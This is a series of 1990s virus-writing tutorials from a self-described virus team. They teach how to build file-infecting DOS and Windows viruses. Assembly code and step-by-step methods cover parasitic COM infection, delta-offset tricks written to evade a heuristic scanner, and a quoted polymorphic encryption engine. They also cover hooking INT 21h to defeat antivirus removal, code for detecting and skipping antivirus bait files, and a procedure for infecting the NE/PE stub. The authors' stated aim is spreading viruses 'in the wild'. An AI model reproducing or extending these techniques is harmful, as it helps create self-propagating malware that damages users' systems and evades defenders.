The Jerk1N's Tutorial Series

  1. Parasitic COM Infection
  2. Memory Addressing
  3. Anti-Removal
  4. Anti-Bait
  5. NE EXE Infection
Jerk1N's Tutorial On Parasitic COM Infection

I won't blast out all assembly stuff in your face, I assume you can at least
write an overwritting virus in assembly.

1) What To Save
2) Jumping to the Virus
3) Extra Trix

1. What To Save
 Okay, in a standard COM infection, the first 3 bytes must be saved, so
read them and place them in a empty area (WITHIN THE VIRUS! NOT IN THE
HEAP!), as a default you should have 3 bytes -

orig3   db      0CDh,20h,00h

These 3 MUST be restored before reading the new 3 bytes, this is done by -
        mov     di,100h
        lea     si,[bp+offset orig3]    ;Assuming BP contains delta offset

Why 3? Well a jump statement in ASM compiled is a 1 byte statement with
a 2 byte address, so 3 bytes to jump to your virus is needed.

2. Jumping to the Virus
 The best whay to make sure your jump is 3 bytes long is to type it in
in DB statements -

        db      0E9h,00h,00h

So these 3 bytes overwrite the bytes you have saved. BEFORE you write them,
this is one thing I forgot about in Lone.Vengance at first, you must LSEEK
to the END of the file to get the address of where you are jumping to and
replace the two 00h bytes with the new address. Just remember to LSEEK back
to the beginning before you write the 3 bytes, else you'll be writting them
to the end of the file, and that's NOT what we want. After this LSEEK to the
end of the file and write the virus.

3. Extra Trix
 If you look at my Lone.Vengance virus, I save 6 bytes instead of 3! The
reason is that I have 05h,00h,00h so I could use these for checking if I
had already infected the selected file.

If you have any comments, questions etc. just EMail me at

DIFFUSION's website -
Jerk1N's Tutorial On Memory Addressing

The first thing to do in a virus (and any other program which might need it!)
is to get the DELTA OFFSET, this internally shows us the location in memory
and will be the basis for accessing parts of the virus. To get the Delta
Offset we must use some code like this -

        call    $+3
        pop     bp
        sub     bp,offset $-1


        call    getdo
getdo:  pop     bp
        sub     bp,offset getdo

Unfortunatly ThunderByte has stuck this in their heuristic scanner so a flag
is set if this is found. Of course us virii programers work around everything
so the code would be like this -

        call    $+3
        pop     si
        sub     si,offset $-1
        xchg    si,bp

        call    $+3
c:      pop     si
        xchg    si,bp
        sub     bp,offset c

        call    c
c:      pop     si
        xchg    si,bp
        sub     bp,offset c

BTW - You don't have to use SI as the tempory register, it's just one I
picked for this example.

Once this is done, any section of your virus can be accessed from anywhere.
The step to do this is simple -

Instead of -
        lea     dx,[offset filespec]
use -
        lea     dx,[bp+offset filespec]

NOTE - You MUST include the square brackets!!!!

A good Question
When do I use LEA and when do I use MOV?

When accessing a sub-routine or interrupt call which requires a POINTER

        DX = pointer to ASCIZ filename

then you will require a LEA as you will want to Load an Exact Address. I
don't think LEA stands for that but it's the easiest way to remember it.
 However, If you want the VALUE STORED at an address then use MOV to put
the value AT the given address INTO the selected variable.
100h         jmp     tk
103h joke    db      05h,05h
105h tk:
107h         lea     dx,[bp+offset joke]     ;DX = 0103h (ADDRESS Of joke)
10Ah         mov     dx,[bp+offset joke]     ;DX = 0505h (Word @ Joke offset)

Need any more help? Just Mail me
        Jerk1N, of DIFFUSION Virus Team

"Life is anything which dies when you stomp on it!" - Jerk1N - DIFFUSION HomePage
Jerk1N's Tutorial On Anti-Removal
Well, I'm back again.... Your probably getting bored stiff with the shit
that I write in here! BUT hold on, this one might actually do some good!
Now then, where was I? Oh yes, Anti-Removal... Okay, if a virus is to
survive it needs to eliminate all ways of eliminating it so.......

Trick 1: Polymorphism
Well, this doesn't work to great now-a-days, now AV have started developing
software which undoes the engine BUT doesn't execute the virus! If you make
your own engine, then you might get a bit further, but not much.
Polymorphism was designed so viruses couldn't be string scanned, this also
helped to take out removal because it'd be different every time. I don't
like polymorphism to be honest, which is what lead me to my JVS....

Example of a polmorphic engine, taken from the MARIANO virus by Super/29A
This is probably the smallest engine!

  ;------------> here starts poly engine <------------;
      call get_delta                                  ;
  get_delta:                                          ;
      pop si                                          ;
      sub si,(offset get_delta-offset vir_start)      ;
      mov di,dx                                       ;
      mov bp,10bh                                     ;
      call garbage                                    ;
      and cl,ah                                       ;
      mov al,0beh                                     ;
      xor al,cl                                       ;
      stosb                                           ;
      in ax,40h                                       ;
      stosw                                           ;
      sub bp,ax                                       ;
      call garbage                                    ;
      mov ax,0b480h                                   ;
      xor ah,cl                                       ;
      stosw                                           ;
      xchg bp,ax                                      ;
      stosw                                           ;
      mov eax,0f8794600h                              ;
      or ah,cl                                        ;
      in al,40h                                       ;
      stosd                                           ;
      mov cx,vir_length                               ;
  decrypt:                                            ;
      movs byte ptr es:[di],cs:[si]                   ;
      xor byte ptr [di-1],al                          ;
      loop decrypt                                    ;
  ;-------------> here ends poly engine <-------------;

  garbage proc
      inc bp
      inc bp
      in ax,40h
      and al,111b
      or al,0b0h
      jp garbage
  garbage endp

Trick 2: JVS/Virus Scrambling
Rock and roll! I had invented a new way to hide viruses! However, v1 and
v1.3 were very limited and had 2 states, scrambled and de-scrambled. v2 will
be random, it'll take bytes from random address' and switch them around.
This will provide a remarkable hiding and anti-removal tool. JVS v2 will be
release as soon as I can find the bug which screws it up!

Trick 3: Embedding
This *MIGHT* work, if so it'd rule! Okay, how it works is this. The virus
opens up the file, shifts up the file from the middle, and adds itself to the
middle of the file then lowering the code down for execution (if COM). I
have a feeling it wouldn't work with EXE's but maybe with COM's! This will
also avoid most AV software, because from what I can gather, AV scan
beginning and end of the files ONLY!!

Trick 4: TSR Middle Finger Salute
I like that name! )8-D.... Okay, this is a trick I've designed ages ago, I
never use it 'cos I don't make ressy viruses! Don't know why not, I just
don't. To really KICK ASS, use tunneling to gain the original INT 21h vector,
hook it, now when checking for OPEN FILE and EXECUTE (and others you watch)
also check for the RE-VECTOR, if an AV tries to remove your code by switching
the direction of the INT 21h call then tell your virus to call INT 24h!
Watch the AV get screwed up as it cannot clean up.....

If I can remember any more, I might make AR2.TXT! That poly engine is kewl...
Well done Super!

Cenobyte        Have you started World War ]I[? |8-D
Cicatrix        Brill Site Man! Keep it rolling! (Also keep VDAT up-to-date!)
Crack's Whore   Are you just gonna sit there?
Dark Mage       How about you?
Foxz            Hey, wanna put this in your news letter?
HamDan Wong     Are we gonna see virus production?
Lot M           Where's this TSR? Still working on it?
mach 1          Hey, can you give me some of your 25 grand? ;)
Mike Lopez      Have you got anything on your site yet?
Nuclii          Where's that bloody interview?
Patrick Mullen  Thanx for the support, I'm in mixed state at the minute!
Slage Hammer    Huh, what can I say? G'day! Thanx for all the stuff!
Smuilt          GodSquad lacked, learn ASM and produce more!! ;)
Synthesia       Hello? Are you in DIFFUSION?
VicodinES       Anxiety.Poppy.IV SE rulez man!!! Thanx for AccessiV info!
Virus           You are fucking crazy! I suggest you cool down!

        Cool down,
Ice Breaker's Tutorial On Anti-Bait Coding
 Well, I'm back! (Jerk1N?) I'm here again to advance your knowledge in virus
production, giving your viruses the edge in "The Wild"! So do you know what
a bait file is? Yes, well skip this bit! No? Okay, A bait file are files
created especially to capture/isolate your viruses so a scan string can be
created for it. It also allows AV ppl (I'm not as aggresive to them anymore,
as they help spread my name!) to get your superior coding (Hey, d'ya want
some support?).
 I am *VERY* supprised over the number of viruses which incorperate this
tricks, they are often small so I think they are invaluable. The only reason
my Straight Life is the first to include Anti-Bait is because I didn't really
need it. Most only had a simple encryption algorythm, S. Life contains 3
encryptors working in different ways! (None are polymorphic though)

SECTION 1: DTA Closed File Methods
 Trick 1: File Size Checking
 Very small files don't appear on a system for a reason! So assume that they
are bait. Simple bait files are usually up to 10 bytes long for a COM. I've
NEVER seen a bait file for DOS EXE's, PE EXE's, or NE EXE's... That's 'cos
all MY attempts failed! But now there are problems, Files are being "Padded"
to increase the size but are coded so they still exit without doing anything.
I recommend you DON'T infect COM's under 1kb and EXE's under 4kb, however you
must vary these amounts according to the amount of armour on your virus. The
problem is, if you set the values too high, you'll lose valuable files to
infect when it's not being "Baited".... Be Carefull!

;Set your DTA to the virus!
;Get your file into the DTA
;I assume BP is Delta Offset and DTA is the DTA's Label!

;If it's EXE use this -
        cmp     byte ptr [bp+offset DTA+1Bh],10h        ;4Kb
        jle     Find_Next               ;Find next file!
        jmp     Infect                  ;It's clear to infect!

;If it's a COM use this -
        cmp     byte ptr [bp+offset DTA+1Bh],4h        ;1Kb, I think!
        jle     Find_Next               ;Find next file!
        jmp     Infect                  ;It's clear to infect!

 Trick 2: Standard Bait Filenames
 Well, How many EXE's or COM's do you have on your harddisk labeled
'00000000.COM', '00000001.COM'... hey? None, except for those generators
which come with some polymorphic engines. I think it's stupid to provide
generators, It's okay to show somebody the differences in the products BUT it
also gives the AV ppl the ability to generate THOUSANDS of copies of the
engine and working out an algorythm which will pin-point that exact engine!
 Any of these files in 1 directory gets suspicious! So avoiding them is a must
check my sample taken from my Straight Life virus, I knew it'd come in handy
for something!

        xor     ax,ax
        lea     bx,[bp+offset dta+1Fh]
        xor     dx,dx
        mov     cx,07h

isl:    inc     dx
        cmp     byte ptr [bx],byte ptr [bx-1h]          ;Is it a consistant character?
        jne     safe
        cmp     byte ptr [bx],' '
        je      tb
        cmp     byte ptr [bx],'.'
        je      tb

        inc     ax              ;Same as previous, Increase Flag

safe:   inc     bx
        loop    isl
        mov     cx,08h
        sub     cx,dx                   ;CX Holds name length
        dec     cx                      ;Check last character for different
        cmp     ax,cx
        jge     getnext                 ;Is *Probably* Bait, so avoid!

;Go on to check File Size! Another Anti-Bait tactic!

SECTION 2: Open File Methods
 Trick 1: Exit Now!
 The easiest way to check for a bait file... Works best with COM's, I've not yet tried it
with EXE's. When reading in the first few bytes of the file during COM infection check for
CDh 20h or check for the INT 21h Exit calls (There are a couple, AH=4Ch, AH=00h).. anyway
if these are found at the beginning of the file, somehow I seem to think these are bait
files. Don't you? Yes? Good, at least we're getting somewhere! :)
 For EXE's it'll be slightly different, you'll have to find the code's starting offset,
LSEEK there (move the file pointer), read in about 5 bytes and check for these exit
routines.... Guarantueed to fin 100% of bait files using a quick Exit To Dos! If any of 
you creates a rountine to find EXE bait files using this method, please can you send me a
sample, my address is at the bottom.

 Trick 2: Do-Nothing till the day you Die
 Very simple this, read in about 10 bytes of the code section, COM is at the beginning of
the file, EXE code will have to be calculated from details in the header. Check all ten
bytes for code which contains Do-Nothing code, eg. is a load of NOPs (90h) or are push-pop
(eg. Push Ax, Pop Ax)... These are used so the program can hit the Exit code near the end
of the coding without crashing the computer and bombing the program out etc. These are also
Junk Code statements used by poly. engines so BE CAREFULL!
 To check all these Do-Nothing Op-Codes, I suggest you implement a Polymorhic Engine's Junk
Code Generator and use it to get Junk code to compare with in the file!

 Well, I'm exhausted... Think what you will of these tricks, and I'd love to see more anti-
bait coding in viruses, they just seem to be getting Lamer and Lamer! Where have all the
"veteran" coders gone? I suggest that you ppl producing over-writer's all the time LEARN!
Those who are moving on to Parasitic stuff, keep going! Those who have started on the hard
stuff, PE EXE's, Win95/NT/98 compatability, Start armouring your viruses!
 There is a complete lack of armouring in viruses now-a-days.. Also, the simple stealth is
being missed out, changing file dates back is one MAJOR example... Oh that reminds me, I
gotta put that into Straight Life...
 Well, you got more of my knowledge, I hope it was worth it! USE THIS CODE, OR SOME WHICH

 Good night ppl! Come again for my next tutorial, which is on ???? ;) Keep an eye out!

Cenobyte        Are you sure 10 days is good enough?
Cicatrix        Hey, where's the DIFFUSION collection? :)
Crack's Whore   Why don't you just finish off that last bit of coding?
Dark Mage       Alpha stages? Are we gonna see a complete product?
Foxz            You are one serious arse-hole! ;)
HamDan Wong     C'mon man, get your ass moving....
Lot M           Nice knowing ya, Goodbye my friend.. BYE!
Jerk1N          Am I you? ;) What a give-a-way!
mach 1          Have you been caught? You fool!
Mike Lopez      Where have you gone?
RAiD            Host control was SOOOOO simple! ;)
Slage Hammer    D'ya recieve my snail-mail yet? ;)
Smuilt          Deep Thought is kewl, and Cicatrix has got it! heheh
Synthesia       Sorry to here ya go my friend.... BYE!
VicodinES       Are you still creating those little fellows?
Virtual Deamon  Hey, Love SLAM #4!!!!!!!!
Virus           Your CRAZY!

        Cool down,
                1ce Breaker
Ice Breaker's Tutorial On NE EXE Infection
 I have found problems within the virus community. Althought NE EXE's are
dying off and PE's are taking over, I still think that NE infection should
be known.. Unfortunately, I don't understand it yet, so as I write this,
I'll be testing it out. I hope this will help you, as it will me. The code
will be tested, but possibly buggy, Sorry but I can't do any better. The
presented code will be new and unique as I have coded from scratch! So pls
bare with me and my coding.
 For you to take notice in this, I recommend you learn these first!
 1. Overwritter
 2. Parasitic COM
 3. Parasitic DOS EXE  (Actually, Not Required)
 If you haven't done these, go away until you have!

This is not the best way to do it, but hey, it's new and unique! (And for
you beginners, VERY simple!)...

The Concept
Infect the STUB (If you don't know what this is, please leave this, learn,
then return!) with your virus (Make sure you have enough space, or make
more for it). Next comes the idea of infection, Re-launch is the key-word!

Stepz of Infection
After you've found the EXE, and saved it's name..
1. Open File

2. Read the entire header from offset 00h to 3Fh. Contains IMPORTANT

3. Check Offset 18h = 40h (@)

4. Read in the Word at 3Ch. This tells you where the NE/PE header is,
   This is VERY Important!

5. Get the IP address from Word Offset 8h, the IP is the only thing
   we need though, this tells us where the code starts for the "This
   program requires ...." message. This requires slight alteration -
   40h Start is shown as 04h, 200h Start is shown as 20h.

   Simple command is load word offset 8h into ax (or any reg you want)
   and have on the next line -
   rol  ax,04h

   I know in the MZ DOS header the CS:IP was at 14h, but view as many
   PE's and NE's as you want, you'll notice mine works!

6. Now, Subtract the NE/PE Header start from the IP, This gives you the
   size of the available space to the virus.

7. Compare the virus size to the available space, if the space is too small
   you can either, leave the file, or attempt a patching (Move the file from
   the NE/PE header down, just enough to fit the virus in.. Remember to patch
   the header for the new NE/PE Header offset!). I don't recommend patching,
   it will require alot of disk access, probably giving away the virus!

8. Seek from the start to the NE/PE header and check it's a NE Header...
   If it is not, abort! (Remember, this works with PE EXE's as well!)

9. Seek from the start of the file to the beginning of the STUB

10. Write the virus! The Fun part! Hehehe

11. Seek to the NE Header.

12. Now for the new part, Eliminate the NE Text, use it to create a
    "Infected" Marker.

13. Close the file

Restoring the Host
 This is easy! Now, if you've been good, and remembered to save the name, The
virus should have the current EXE's name in it. All you do now, is COPY the
Host to a Unused name, such as L437GHF4.EXE, Open it, Seek to the Start of the
NE Header (Save this address as well!) and Overwrite your marker with "NE" to
restore it's WINDOZE code, then close the file and call an execution routine!

 A far and winding road, but hey, from my testing it works! I'm sure you can
go in and play with the NE Header, but I couldn't be arsed really! Also, I
think that this method is kewl as, providing you don't patch the file, the
size doesn't increase, and is more reliable than the viruses which search for
chains of constants, because ALL Win files has the STUB, but they don't all
have chains of constants! 100% Original Idea, 0% given code, for 3 reasons
1. It's too simple to need to provide samples
2. A version of this code will be in the Straight Life virus
3. I'm too lazy to write it in this tutorial! HAHAHAHAHAHA

Last Minute Notes
 I just tried this idea with a PE file, and it works!!!!!!!!!!!!!!!!

Cenobyte        Hey man, the work'll cool off soon! Stick with us!
Cicatrix        Wanna do your own interview with me?
Crack's Whore   Compile that fucking virus!
Dark Mage       Why don't you tell me your problem, so I can help!
Foxz            I **HATE** your site! ;)
HamDan Wong     Where are you, my friend?
Jerk1N          ???? ;)
Mike Lopez      Why aren't you responding to my letters?
Opic            Kewl viruses my friend, talk soon?
RAiD            What did ya think of Hellphoria?
Rajaat          If you read this, please mail me....
SerialKiller    Why don't my ICQ messages go through to you?
Slage Hammer    You need England on my address to reach me... :)
Smuilt          Where's the re-write of your database?
SPo0ky          Found the SDK's and DDK's yet? ;)
VicodinES       Where are you? Not seen you for ages..
Virtual Deamon  Slam #5?
Virus           How's AccessiV.C doing on the BBS? ;)

        Cool down to the ice level,
                ][ce Breaker